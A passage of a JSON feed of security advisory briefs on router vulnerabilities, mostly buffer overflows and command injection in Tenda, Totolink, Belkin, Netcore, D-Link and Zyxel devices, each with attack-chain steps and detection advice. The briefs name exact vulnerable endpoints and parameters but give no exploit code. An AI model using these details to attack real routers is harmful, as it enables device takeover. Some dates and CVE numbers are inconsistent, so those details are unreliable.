Suspicious Firewall CGI Requests\u003c/code\u003e to your SIEM and tune for your environment to identify potential exploitation attempts targeting the \u003ccode\u003e/cgi-bin/firewall.cgi\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect UPNP Enabled Overflow\u003c/code\u003e to detect possible overflows.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for requests to \u003ccode\u003e/cgi-bin/firewall.cgi\u003c/code\u003e with unusually long \u003ccode\u003eUpnpEnabled\u003c/code\u003e parameters.\u003c/li\u003e\n\u003cli\u003eIf possible, isolate Wavlink WL-WN579X3-C 231124 routers from direct internet exposure until a patch is available.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-29T00:00:00Z","date_published":"2026-03-29T00:00:00Z","id":"/briefs/2026-03-wavlink-overflow/","summary":"A stack-based buffer overflow vulnerability exists in Wavlink WL-WN579X3-C 231124's UPNP Handler component, specifically in the /cgi-bin/firewall.cgi file and the sub_4019FC function, allowing remote attackers to execute arbitrary code by manipulating the UpnpEnabled argument; public exploits are available, but the vendor has not responded to the disclosure.","title":"Wavlink WL-WN579X3-C Stack-Based Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-03-wavlink-overflow/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["tenda","router","buffer overflow","cve-2026-4975"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2026-4975 is a critical security vulnerability affecting Tenda AC15 routers running firmware version 15.03.05.19. This vulnerability resides in the \u003ccode\u003eformSetCfm\u003c/code\u003e function, specifically within the \u003ccode\u003e/goform/setcfm\u003c/code\u003e file, which handles POST requests. An attacker can exploit a stack-based buffer overflow by sending a crafted POST request with a malicious payload in the \u003ccode\u003efuncpara1\u003c/code\u003e argument. The vulnerability is remotely exploitable, meaning an attacker does not need local access to the device…\u003c/p\u003e\n","date_modified":"2026-03-28T12:00:00Z","date_published":"2026-03-28T12:00:00Z","id":"/briefs/2026-03-tenda-ac15-bo/","summary":"A stack-based buffer overflow vulnerability (CVE-2026-4975) exists in the Tenda AC15 router version 15.03.05.19, allowing remote attackers to execute arbitrary code by manipulating the 'funcpara1' argument in a POST request to /goform/setcfm.","title":"Tenda AC15 Stack-Based Buffer Overflow Vulnerability (CVE-2026-4975)","url":"https://feed.craftedsignal.io/briefs/2026-03-tenda-ac15-bo/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-4976","buffer-overflow","totolink","router","remote-code-execution"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA critical buffer overflow vulnerability, CVE-2026-4976, has been identified in Totolink LR350 routers running firmware version 9.3.5u.6369_B20220309. The vulnerability resides in the \u003ccode\u003esetWiFiGuestCfg\u003c/code\u003e function within the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e file. By crafting a malicious HTTP request and manipulating the \u003ccode\u003essid\u003c/code\u003e argument, a remote, unauthenticated attacker can trigger a buffer overflow, potentially leading to arbitrary code execution on the device. The availability of a public exploit…\u003c/p\u003e\n","date_modified":"2026-03-27T21:17:28Z","date_published":"2026-03-27T21:17:28Z","id":"/briefs/2026-03-totolink-buffer-overflow/","summary":"A buffer overflow vulnerability in Totolink LR350 version 9.3.5u.6369_B20220309 allows a remote attacker to execute arbitrary code by manipulating the 'ssid' argument in the setWiFiGuestCfg function.","title":"Totolink LR350 Remote Buffer Overflow Vulnerability (CVE-2026-4976)","url":"https://feed.craftedsignal.io/briefs/2026-03-totolink-buffer-overflow/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve","buffer-overflow","router"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA stack-based buffer overflow vulnerability has been identified in Tenda AC7 router firmware, specifically version 15.03.06.44. The vulnerability resides in the \u003ccode\u003efromSetSysTime\u003c/code\u003e function within the \u003ccode\u003e/goform/SetSysTimeCfg\u003c/code\u003e component, which handles POST requests. A remote attacker can exploit this flaw by crafting a malicious POST request with an overly long \u003ccode\u003eTime\u003c/code\u003e argument, causing a buffer overflow on the stack. Publicly available exploits exist, increasing the risk of exploitation. Successful exploitation could lead to arbitrary code execution on the device, potentially granting the attacker complete control over the router. This is a critical vulnerability due to the ease of remote exploitation and the potential for significant impact.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a Tenda AC7 router running firmware version 15.03.06.44.\u003c/li\u003e\n\u003cli\u003eAttacker crafts a POST request targeting the \u003ccode\u003e/goform/SetSysTimeCfg\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe POST request includes the \u003ccode\u003eTime\u003c/code\u003e argument, set to a string exceeding the expected buffer size.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003efromSetSysTime\u003c/code\u003e function processes the \u003ccode\u003eTime\u003c/code\u003e argument without proper bounds checking.\u003c/li\u003e\n\u003cli\u003eThe overly long \u003ccode\u003eTime\u003c/code\u003e argument overflows the stack buffer during the copy operation.\u003c/li\u003e\n\u003cli\u003eThe buffer overflow overwrites critical data on the stack, including the return address.\u003c/li\u003e\n\u003cli\u003eThe attacker controls the overwritten return address, redirecting execution flow to malicious code.\u003c/li\u003e\n\u003cli\u003eThe attacker gains arbitrary code execution on the router, potentially leading to complete device compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows a remote attacker to execute arbitrary code on the affected Tenda AC7 router. This can lead to a variety of malicious outcomes, including complete device compromise, modification of router settings (DNS, firewall rules), interception of network traffic, and use of the router as a botnet node. Given the widespread use of Tenda routers, a large number of devices could be vulnerable, potentially impacting home users and small businesses.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply available patches or firmware updates provided by Tenda to address CVE-2026-4974.\u003c/li\u003e\n\u003cli\u003eMonitor webserver logs for POST requests to \u003ccode\u003e/goform/SetSysTimeCfg\u003c/code\u003e with abnormally long \u003ccode\u003eTime\u003c/code\u003e parameters, using the Sigma rule provided below.\u003c/li\u003e\n\u003cli\u003eImplement rate limiting on the \u003ccode\u003e/goform/SetSysTimeCfg\u003c/code\u003e endpoint to mitigate brute-force attempts to exploit the vulnerability.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to detect processes spawned by the webserver after the exploit is triggered.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-27T20:16:38Z","date_published":"2026-03-27T20:16:38Z","id":"/briefs/2026-03-tenda-ac7-overflow/","summary":"A stack-based buffer overflow vulnerability exists in Tenda AC7 version 15.03.06.44 within the fromSetSysTime function of the /goform/SetSysTimeCfg component's POST Request Handler, allowing a remote attacker to potentially execute arbitrary code by manipulating the 'Time' argument.","title":"Tenda AC7 Stack-Based Buffer Overflow in SetSysTimeCfg","url":"https://feed.craftedsignal.io/briefs/2026-03-tenda-ac7-overflow/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-4960","buffer-overflow","tenda","router"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA critical stack-based buffer overflow vulnerability has been identified in Tenda AC6 router firmware version 15.03.05.16. The vulnerability, tracked as CVE-2026-4960, resides within the \u003ccode\u003efromWizardHandle\u003c/code\u003e function of the \u003ccode\u003e/goform/WizardHandle\u003c/code\u003e component, which handles POST requests. A remote attacker can exploit this vulnerability by sending a crafted POST request with a manipulated \u003ccode\u003eWANT\u003c/code\u003e or \u003ccode\u003eWANS\u003c/code\u003e argument, leading to arbitrary code execution on the device. Public exploit code is available, increasing the risk of widespread exploitation. This vulnerability poses a significant threat, potentially allowing attackers to gain complete control over vulnerable routers and compromise connected networks.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a Tenda AC6 router running firmware version 15.03.05.16.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious POST request targeting the \u003ccode\u003e/goform/WizardHandle\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eWithin the POST request, the attacker manipulates the \u003ccode\u003eWANT\u003c/code\u003e or \u003ccode\u003eWANS\u003c/code\u003e argument to inject a payload exceeding the buffer size.\u003c/li\u003e\n\u003cli\u003eThe router processes the POST request, passing the attacker-controlled input to the vulnerable \u003ccode\u003efromWizardHandle\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe overflow occurs when the \u003ccode\u003efromWizardHandle\u003c/code\u003e function copies the attacker-supplied data into a fixed-size buffer on the stack without proper bounds checking.\u003c/li\u003e\n\u003cli\u003eThe injected payload overwrites adjacent memory locations on the stack, including the return address.\u003c/li\u003e\n\u003cli\u003eWhen the \u003ccode\u003efromWizardHandle\u003c/code\u003e function returns, it jumps to the attacker-controlled address.\u003c/li\u003e\n\u003cli\u003eThe attacker gains arbitrary code execution on the router, potentially leading to complete system compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows a remote attacker to gain complete control of the affected Tenda AC6 router. This can lead to a variety of malicious outcomes, including network hijacking, DNS poisoning, interception of network traffic, deployment of malware, and the creation of botnets. Given the widespread use of Tenda routers in home and small business networks, a large number of devices are potentially vulnerable. The CVSS v3.1 score of 8.8 reflects the high severity of this vulnerability.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply any available firmware updates from Tenda to patch CVE-2026-4960.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for suspicious POST requests to \u003ccode\u003e/goform/WizardHandle\u003c/code\u003e with abnormally long \u003ccode\u003eWANT\u003c/code\u003e or \u003ccode\u003eWANS\u003c/code\u003e parameters using the Sigma rule provided below.\u003c/li\u003e\n\u003cli\u003eImplement network intrusion detection system (NIDS) rules to detect exploit attempts targeting the \u003ccode\u003e/goform/WizardHandle\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eRestrict access to the router\u0026rsquo;s web interface from the public internet where possible to reduce the attack surface.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-27T17:16:30Z","date_published":"2026-03-27T17:16:30Z","id":"/briefs/2026-03-tenda-ac6-overflow/","summary":"A stack-based buffer overflow vulnerability in Tenda AC6 version 15.03.05.16 allows remote attackers to execute arbitrary code by manipulating the WANT/WANS argument in the /goform/WizardHandle POST request handler.","title":"Tenda AC6 Stack-Based Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-03-tenda-ac6-overflow/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["buffer-overflow","tenda","router","cve-2026-4905"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA stack-based buffer overflow vulnerability, identified as CVE-2026-4905, has been discovered in Tenda AC5 home routers running firmware version 15.03.06.47. The vulnerability resides within the \u003ccode\u003eformWifiWpsOOB\u003c/code\u003e function in the \u003ccode\u003e/goform/WifiWpsOOB\u003c/code\u003e file, which handles POST requests. Attackers can remotely exploit this flaw by crafting a malicious POST request to this endpoint, specifically targeting the \u003ccode\u003eindex\u003c/code\u003e argument. Successful exploitation leads to arbitrary code execution on the device…\u003c/p\u003e\n","date_modified":"2026-03-27T00:16:24Z","date_published":"2026-03-27T00:16:24Z","id":"/briefs/2026-03-tenda-ac5-overflow/","summary":"A stack-based buffer overflow vulnerability (CVE-2026-4905) exists in Tenda AC5 firmware version 15.03.06.47 allowing remote attackers to execute arbitrary code by manipulating the 'index' argument in a POST request to the /goform/WifiWpsOOB endpoint.","title":"Tenda AC5 Stack-Based Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-03-tenda-ac5-overflow/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["command-injection","rce","vulnerability","netcore","router"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA remote command execution vulnerability, CVE-2026-4840, affects Netcore Power 15AX devices with firmware versions up to 3.0.0.6938. The vulnerability resides in the Diagnostic Tool Interface, specifically within the \u003ccode\u003esetTools\u003c/code\u003e function of the \u003ccode\u003e/bin/netis.cgi\u003c/code\u003e file. By manipulating the \u003ccode\u003eIpAddr\u003c/code\u003e argument, an attacker can inject and execute arbitrary operating system commands on the device. This vulnerability poses a significant risk, as it allows unauthenticated remote attackers to gain complete…\u003c/p\u003e\n","date_modified":"2026-03-26T05:16:40Z","date_published":"2026-03-26T05:16:40Z","id":"/briefs/2026-03-netcore-rce/","summary":"CVE-2026-4840 is a critical command injection vulnerability in the Netcore Power 15AX router that allows remote attackers to execute arbitrary OS commands by manipulating the IpAddr argument in the setTools function of the /bin/netis.cgi file.","title":"Netcore Power 15AX Remote Command Execution Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-03-netcore-rce/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["command-injection","router","legacy-device"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2026-4627 is an OS command injection vulnerability affecting D-Link DIR-825 and DIR-825R routers, specifically versions 1.0.5 and 4.5.1. The vulnerability resides within the \u003ccode\u003ehandler_update_system_time\u003c/code\u003e function of the \u003ccode\u003elibdeuteron_modules.so\u003c/code\u003e file, which is part of the NTP service. An attacker with administrative privileges can inject arbitrary OS commands by manipulating the input to this function. The vulnerability can be exploited remotely, allowing a threat actor to potentially gain…\u003c/p\u003e\n","date_modified":"2026-03-24T05:16:24Z","date_published":"2026-03-24T05:16:24Z","id":"/briefs/2026-03-dlink-command-injection/","summary":"CVE-2026-4627 is an OS command injection vulnerability in the handler_update_system_time function of the libdeuteron_modules.so file in the NTP Service component of D-Link DIR-825 and DIR-825R devices, which can be exploited remotely by authenticated attackers.","title":"D-Link DIR-825/825R OS Command Injection Vulnerability (CVE-2026-4627)","url":"https://feed.craftedsignal.io/briefs/2026-03-dlink-command-injection/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-4553","tenda","buffer-overflow","router"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA stack-based buffer overflow vulnerability, tracked as CVE-2026-4553, has been identified in Tenda F453 version 1.0.0.3. The flaw resides within the \u003ccode\u003efromNatlimit\u003c/code\u003e function of the \u003ccode\u003e/goform/Natlimit\u003c/code\u003e component\u0026rsquo;s Parameters Handler. Publicly available exploits exist, increasing the risk of exploitation. Successful exploitation could allow an attacker to execute arbitrary code on the affected device. This vulnerability poses a significant threat to users of the Tenda F453 router, potentially…\u003c/p\u003e\n","date_modified":"2026-03-23T12:00:00Z","date_published":"2026-03-23T12:00:00Z","id":"/briefs/2026-03-tenda-stack-overflow/","summary":"A stack-based buffer overflow vulnerability exists in Tenda F453 version 1.0.0.3 in the fromNatlimit function of the /goform/Natlimit Parameters Handler component, triggered remotely by manipulating the 'page' argument, allowing for potential arbitrary code execution.","title":"Tenda F453 Router Stack-Based Buffer Overflow Vulnerability (CVE-2026-4553)","url":"https://feed.craftedsignal.io/briefs/2026-03-tenda-stack-overflow/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-4567","stack-based buffer overflow","tenda","router","remote code execution"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA critical stack-based buffer overflow vulnerability, identified as CVE-2026-4567, has been discovered in Tenda A15 wireless routers running firmware version 15.13.07.13. The vulnerability resides in the \u003ccode\u003eUploadCfg\u003c/code\u003e function within the \u003ccode\u003e/cgi-bin/UploadCfg\u003c/code\u003e file, which handles file uploads.  A remote attacker can exploit this flaw by crafting a malicious request to the router, specifically targeting the \u003ccode\u003eFile\u003c/code\u003e argument, to overwrite the stack buffer and potentially gain arbitrary code execution…\u003c/p\u003e\n","date_modified":"2026-03-23T03:16:00Z","date_published":"2026-03-23T03:16:00Z","id":"/briefs/2026-03-tenda-a15-bo/","summary":"A stack-based buffer overflow vulnerability (CVE-2026-4567) exists in the UploadCfg function of the /cgi-bin/UploadCfg file in Tenda A15 firmware version 15.13.07.13, allowing remote attackers to execute arbitrary code by manipulating the File argument.","title":"Tenda A15 Router Stack-Based Buffer Overflow (CVE-2026-4567)","url":"https://feed.craftedsignal.io/briefs/2026-03-tenda-a15-bo/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-4566","buffer-overflow","router","rce"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA stack-based buffer overflow vulnerability has been discovered in the Belkin F9K1122 router, specifically version 1.00.33. The vulnerability resides within the \u003ccode\u003eformWISP5G\u003c/code\u003e function located in the \u003ccode\u003e/goform/formWISP5G\u003c/code\u003e file. Successful exploitation involves manipulating the \u003ccode\u003ewebpage\u003c/code\u003e argument, leading to arbitrary code execution. This vulnerability is remotely exploitable, making it a significant threat. Publicly available exploit code exists, increasing the likelihood of exploitation. The vendor was notified but has not responded, indicating a lack of timely patching. This poses a high risk to users of the affected Belkin router model.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a vulnerable Belkin F9K1122 router running firmware version 1.00.33.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting the \u003ccode\u003e/goform/formWISP5G\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eWithin the HTTP request, the \u003ccode\u003ewebpage\u003c/code\u003e argument is manipulated to contain a payload exceeding the buffer size.\u003c/li\u003e\n\u003cli\u003eThe router\u0026rsquo;s web server processes the request and passes the attacker-controlled input to the \u003ccode\u003eformWISP5G\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eformWISP5G\u003c/code\u003e function attempts to copy the oversized \u003ccode\u003ewebpage\u003c/code\u003e argument into a fixed-size buffer on the stack.\u003c/li\u003e\n\u003cli\u003eA stack-based buffer overflow occurs, overwriting adjacent memory regions, including the return address.\u003c/li\u003e\n\u003cli\u003eThe attacker gains control of the program execution flow by redirecting it to attacker-controlled code.\u003c/li\u003e\n\u003cli\u003eThe attacker executes arbitrary code on the router, potentially gaining complete control of the device.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows a remote attacker to execute arbitrary code on the Belkin F9K1122 router. This can lead to a complete compromise of the device, allowing the attacker to modify router settings, intercept network traffic, or use the router as a pivot point for further attacks within the network. Given the wide use of these routers in home and small business environments, a successful widespread attack could impact thousands of users. The absence of a vendor patch exacerbates the risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImplement a web application firewall (WAF) rule to detect and block requests with excessively long \u003ccode\u003ewebpage\u003c/code\u003e arguments to the \u003ccode\u003e/goform/formWISP5G\u003c/code\u003e endpoint, mitigating exploitation attempts (Attack Chain step 3).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule provided to detect suspicious web requests targeting the vulnerable endpoint (see \u0026ldquo;Belkin Router RCE Attempt\u0026rdquo; rule).\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for unusual activity related to the \u003ccode\u003e/goform/formWISP5G\u003c/code\u003e endpoint (Attack Chain step 4).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-23T03:16:00Z","date_published":"2026-03-23T03:16:00Z","id":"/briefs/2026-03-belkin-rce/","summary":"A stack-based buffer overflow vulnerability exists in Belkin F9K1122 version 1.00.33, allowing remote attackers to execute arbitrary code by manipulating the 'webpage' argument in the 'formWISP5G' function.","title":"Belkin F9K1122 Router Stack-Based Buffer Overflow","url":"https://feed.craftedsignal.io/briefs/2026-03-belkin-rce/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["tenda","ac21","buffer_overflow","cve-2026-4565","router"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA critical buffer overflow vulnerability, CVE-2026-4565, affects Tenda AC21 routers running firmware version 16.03.08.16. The flaw resides in the \u003ccode\u003eformSetQosBand\u003c/code\u003e function within the \u003ccode\u003e/goform/SetNetControlList\u003c/code\u003e file. Attackers can exploit this vulnerability by crafting malicious argument lists in HTTP requests, leading to arbitrary code execution on the device. The vulnerability can be exploited remotely and a proof-of-concept exploit is publicly available, increasing the risk of widespread exploitation. Successful exploitation allows attackers to gain complete control over the router, potentially compromising connected devices and network traffic.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a vulnerable Tenda AC21 router with firmware version 16.03.08.16.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP POST request targeting the \u003ccode\u003e/goform/SetNetControlList\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe POST request includes a specially crafted argument list designed to overflow the buffer in the \u003ccode\u003eformSetQosBand\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe router processes the HTTP request and passes the malicious arguments to the vulnerable function.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eformSetQosBand\u003c/code\u003e function attempts to copy the oversized argument list into a fixed-size buffer, triggering a buffer overflow.\u003c/li\u003e\n\u003cli\u003eThe buffer overflow overwrites adjacent memory regions, potentially including critical program data or execution pointers.\u003c/li\u003e\n\u003cli\u003eThe attacker gains control of the program execution flow and injects malicious code.\u003c/li\u003e\n\u003cli\u003eThe injected code executes with elevated privileges, granting the attacker complete control over the router.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows a remote attacker to execute arbitrary code on the Tenda AC21 router. This can lead to a variety of malicious outcomes, including: complete device compromise, modification of router settings, interception of network traffic, deployment of malware to connected devices, and use of the router as a botnet node. Given the wide usage of Tenda routers in home and small business environments, a successful widespread exploit could impact thousands of users.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for suspicious POST requests to \u003ccode\u003e/goform/SetNetControlList\u003c/code\u003e with unusually long or malformed arguments (see rule: \u0026ldquo;Detect Suspicious POST Requests to SetNetControlList\u0026rdquo;).\u003c/li\u003e\n\u003cli\u003eImplement rate limiting on HTTP POST requests to prevent attackers from quickly exploiting the vulnerability.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Tenda AC21 Buffer Overflow Attempt\u0026rdquo; to identify exploitation attempts based on specific patterns in HTTP requests.\u003c/li\u003e\n\u003cli\u003eConsider blocking traffic from known exploit sources, if available.\u003c/li\u003e\n\u003cli\u003eUpgrade to a patched firmware version as soon as it becomes available from the vendor.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-23T01:16:43Z","date_published":"2026-03-23T01:16:43Z","id":"/briefs/2026-03-tenda-ac21-buffer-overflow/","summary":"A buffer overflow vulnerability exists in Tenda AC21 firmware version 16.03.08.16, allowing remote attackers to execute arbitrary code by manipulating arguments to the formSetQosBand function.","title":"Tenda AC21 Router Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-03-tenda-ac21-buffer-overflow/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["zyxel","router","command injection","cve-2026-13942","upnp"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA critical command injection vulnerability, tracked as CVE-2026-13942, has been discovered in the UPnP (Universal Plug and Play) service of Zyxel routers. The vulnerability stems from insufficient validation of input within the UPnP SOAP request processing.  An unauthenticated, remote attacker can exploit this flaw by sending specially crafted UPnP SOAP requests to the affected device. This allows the attacker to inject and execute arbitrary operating system commands with elevated privileges on…\u003c/p\u003e\n","date_modified":"2026-02-27T12:00:00Z","date_published":"2026-02-27T12:00:00Z","id":"/briefs/2026-02-zyxel-rce/","summary":"A critical command injection vulnerability (CVE-2026-13942) in the UPnP function of Zyxel routers allows remote attackers to execute arbitrary operating system commands by sending crafted UPnP SOAP requests.","title":"Critical Command Injection Vulnerability in Zyxel Routers (CVE-2026-13942)","url":"https://feed.craftedsignal.io/briefs/2026-02-zyxel-rce/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-7096"}],"_cs_exploited":false,"_cs_products":["HG3 2.0 300003070"],"_cs_severities":["critical"],"_cs_tags":["command-injection","router","tenda"],"_cs_type":"advisory","_cs_vendors":["Tenda"],"content_html":"\u003cp\u003eA critical command injection vulnerability, identified as CVE-2026-7096, affects Tenda HG3 2.0 300003070 routers. The vulnerability resides in the \u0026lsquo;formgponConf\u0026rsquo; function within the \u0026lsquo;/boaform/admin/formgponConf\u0026rsquo; file. An attacker can exploit this flaw by manipulating the \u0026lsquo;fmgpon_loid\u0026rsquo; argument. Successful exploitation allows a remote attacker to execute arbitrary operating system commands on the affected device. Given the public availability of an exploit, Tenda HG3 devices are at immediate risk of compromise. This poses a significant threat as attackers can potentially gain full control of the router, compromise connected networks, and exfiltrate sensitive information.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable Tenda HG3 2.0 300003070 router with an exposed web interface.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP POST request targeting the \u0026lsquo;/boaform/admin/formgponConf\u0026rsquo; endpoint.\u003c/li\u003e\n\u003cli\u003eThe attacker injects a payload containing OS commands into the \u0026lsquo;fmgpon_loid\u0026rsquo; parameter of the POST request.\u003c/li\u003e\n\u003cli\u003eThe Tenda HG3 router\u0026rsquo;s web server processes the request without proper input validation of the \u0026lsquo;fmgpon_loid\u0026rsquo; parameter.\u003c/li\u003e\n\u003cli\u003eThe injected OS command is executed by the router\u0026rsquo;s operating system with the privileges of the web server process.\u003c/li\u003e\n\u003cli\u003eThe attacker gains remote code execution on the Tenda HG3 router.\u003c/li\u003e\n\u003cli\u003eThe attacker may establish a reverse shell to maintain persistent access or download further malicious payloads.\u003c/li\u003e\n\u003cli\u003eThe attacker can then pivot to internal networks, exfiltrate data, or use the compromised router for other malicious activities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-7096 grants attackers the ability to execute arbitrary OS commands on the Tenda HG3 router. This can lead to complete compromise of the device, allowing attackers to modify router settings, intercept network traffic, and potentially gain access to connected devices on the local network. Given the widespread use of Tenda routers in home and small business environments, a successful attack could impact thousands of users. The vulnerability\u0026rsquo;s high CVSS score of 8.8 underscores the severity and potential for widespread damage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Tenda HG3 Command Injection Attempt\u0026rdquo; to your SIEM to identify exploitation attempts by monitoring HTTP POST requests to \u0026lsquo;/boaform/admin/formgponConf\u0026rsquo; with suspicious commands in the \u0026lsquo;fmgpon_loid\u0026rsquo; parameter.\u003c/li\u003e\n\u003cli\u003eImplement network intrusion detection system (NIDS) rules to detect malicious payloads in HTTP POST requests targeting the vulnerable endpoint, as described in the \u0026ldquo;Attack Chain\u0026rdquo; section.\u003c/li\u003e\n\u003cli\u003eWhile no specific IOCs are provided, analyze network traffic and web server logs for unusual activity originating from or targeting Tenda HG3 routers.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for HTTP POST requests to /boaform/admin/formgponConf (described in Attack Chain step 2).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-tenda-hg3-command-injection/","summary":"A command injection vulnerability (CVE-2026-7096) exists in the Tenda HG3 2.0 300003070 router, allowing remote attackers to execute arbitrary OS commands by manipulating the 'fmgpon_loid' argument in the 'formgponConf' function of the '/boaform/admin/formgponConf' file due to insufficient input validation.","title":"Tenda HG3 Router Command Injection Vulnerability (CVE-2026-7096)","url":"https://feed.craftedsignal.io/briefs/2024-01-tenda-hg3-command-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-7034"}],"_cs_exploited":false,"_cs_products":["FH1202 